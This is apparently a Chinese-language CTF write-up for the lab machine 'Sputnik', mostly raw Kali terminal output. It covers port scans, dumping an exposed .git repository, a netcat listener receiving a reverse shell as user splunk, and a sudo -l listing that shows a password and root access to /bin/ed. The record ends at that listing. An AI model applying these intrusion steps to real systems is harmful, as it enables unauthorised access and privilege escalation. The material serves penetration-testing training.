┌──(kali㉿kali)-[~] └─$ sudo nmap --min-rate 10000 -p- 192.168.56.130 Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 08:40 EDT Nmap scan report for 192.168.56.130 Host is up (0.00034s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 8089/tcp open unknown 55555/tcp open unknown 61337/tcp open unknown MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 9.45 seconds
┌──(kali㉿kali)-[~] └─$ sudo nmap --min-rate 10000 -p- 192.168.56.130 Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 08:40 EDT Nmap scan report for 192.168.56.130 Host is up (0.00071s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 8089/tcp open unknown 55555/tcp open unknown 61337/tcp open unknown MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 9.73 seconds
┌──(kali㉿kali)-[~] └─$ sudo nmap -sT -sV -sC -O -p8089,55555,61337 192.168.56.130 Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 08:41 EDT Nmap scan report for 192.168.56.130 Host is up (0.00055s latency).
PORT STATE SERVICE VERSION 8089/tcp open ssl/http Splunkd httpd |_http-server-header: Splunkd |_http-title: splunkd | ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser | Not valid before: 2019-03-29T11:03:21 |_Not valid after: 2022-03-28T11:03:21 | http-robots.txt: 1 disallowed entry |_/ 55555/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-title: Flappy Bird Game |_http-server-header: Apache/2.4.29 (Ubuntu) | http-git: | 192.168.56.130:55555/.git/ | Git repository found! |_ Repository description: Unnamed repository; edit this file 'description' to name the... 61337/tcp open http Splunkd httpd |_http-server-header: Splunkd | http-title: Site doesn\'t have a title (text/html; charset=UTF-8). |_Requested resource was http://192.168.56.130:61337/en-US/account/login?return_to=%2Fen-US%2F | http-robots.txt: 1 disallowed entry |_/ MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 37.70 seconds
每个端口都有对应的 Web 服务,55555 端口有泄露 .git 的情况
1 2 3 4 5 6 7 8 9 10 11 12 13 14
┌──(kali㉿kali)-[~] └─$ sudo nmap --script=vuln -p8089,55555,61337 192.168.56.130 [sudo] password for kali: Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 08:59 EDT Nmap scan report for 192.168.56.130 Host is up (0.00075s latency).
PORT STATE SERVICE 8089/tcp open unknown 55555/tcp open unknown 61337/tcp open unknown MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 45.10 seconds
漏洞脚本扫描没结果
.git 泄露
简单查看各个 web 界面,发现 55555 端口是个小游戏,8089 是 Splunkd 的管理界面,但是 service 和 serviceNS 都需要登录才能查看,61337 也是需要登录,看起来是后台的正式登录界面
┌──(kali㉿kali)-[~/Downloads/Sputnik/GitTools/Dumper] └─$ ./gitdumper.sh http://192.168.56.130:55555/.git/ clone ########### # GitDumper is part of https://github.com/internetwache/GitTools # # Developed and maintained by @gehaxelt from @internetwache # # Use at your own risk. Usage might be illegal in certain circumstances. # Only for educational purposes! ###########
┌──(kali㉿kali)-[~/…/GitTools/Dumper/clone/_sheet.png.extracted] └─$ git checkout 07fda135aae22fa7869b3de9e450ff7cacfbc717 error: unable to read sha1 file of secret (f4385198ce1cab56e0b2a1c55e8863040045b085) error: invalid object 100644 f4385198ce1cab56e0b2a1c55e8863040045b085 for'secret' D secret Note: switching to '07fda135aae22fa7869b3de9e450ff7cacfbc717'.
You are in'detached HEAD' state. You can look around, make experimental changes and commit them, and you can discard any commits you make in this state without impacting any branches by switching back to a branch.
If you want to create a new branch to retain commits you create, you may do so (now or later) by using -c with the switch command. Example:
git switch -c <new-branch-name>
Or undo this operation with:
git switch -
Turn off this advice by setting config variable advice.detachedHead to false
┌──(kali㉿kali)-[~/Downloads/Sputnik/flappy] └─$ git checkout 07fda135aae22fa7869b3de9e450ff7cacfbc717 Note: switching to '07fda135aae22fa7869b3de9e450ff7cacfbc717'.
You are in'detached HEAD' state. You can look around, make experimental changes and commit them, and you can discard any commits you make in this state without impacting any branches by switching back to a branch.
If you want to create a new branch to retain commits you create, you may do so (now or later) by using -c with the switch command. Example:
git switch -c <new-branch-name>
Or undo this operation with:
git switch -
Turn off this advice by setting config variable advice.detachedHead to false
HEAD is now at 07fda13 Commit new file
┌──(kali㉿kali)-[~/Downloads/Sputnik/flappy] └─$ ls -liah total 52K 1183470 drwxr-xr-x 3 kali kali 4.0K Jul 18 11:04 . 1183326 drwxr-xr-x 5 kali kali 4.0K Jul 18 11:04 .. 1183471 drwxr-xr-x 8 kali kali 4.0K Jul 18 11:04 .git 1183785 -rw-r--r-- 1 kali kali 378 Jul 18 11:04 .gitattributes 1183800 -rw-r--r-- 1 kali kali 649 Jul 18 11:04 .gitignore 1183802 -rw-r--r-- 1 kali kali 7.5K Jul 18 11:04 index.html 1183801 -rw-r--r-- 1 kali kali 26 Jul 18 11:04 README.md 1183806 -rw-r--r-- 1 kali kali 42 Jul 18 11:04 secret 1183803 -rw-r--r-- 1 kali kali 12K Jul 18 11:04 sheet.png 1183804 -rw-r--r-- 1 kali kali 2.1K Jul 18 11:04 sprite.js
┌──(kali㉿kali)-[~] └─$ sudo nc -lvnp 444 [sudo] password for kali: listening on [any] 444 ... connect to [192.168.56.106] from (UNKNOWN) [192.168.56.130] 52604 splunk@sputnik:/$ whoami whoami splunk splunk@sputnik:/$ id id uid=1001(splunk) gid=1001(splunk) groups=1001(splunk) splunk@sputnik:/$ uname -a uname -a Linux sputnik 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux splunk@sputnik:/$ ip a ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: enp0s17: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 link/ether 08:00:27:d8:0b:51 brd ff:ff:ff:ff:ff:ff inet 192.168.56.130/24 brd 192.168.56.255 scope global dynamic enp0s17 valid_lft 600sec preferred_lft 600sec inet6 fe80::a00:27ff:fed8:b51/64 scope link valid_lft forever preferred_lft forever
提权
成功。接下来看看 sudo -l 的权限
1 2 3 4 5 6 7 8 9 10
splunk@sputnik:/$ sudo -l sudo -l [sudo] password for splunk: ameer_says_thank_you_and_good_job
Matching Defaults entries for splunk on sputnik: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User splunk may run the following commands on sputnik: (root) /bin/ed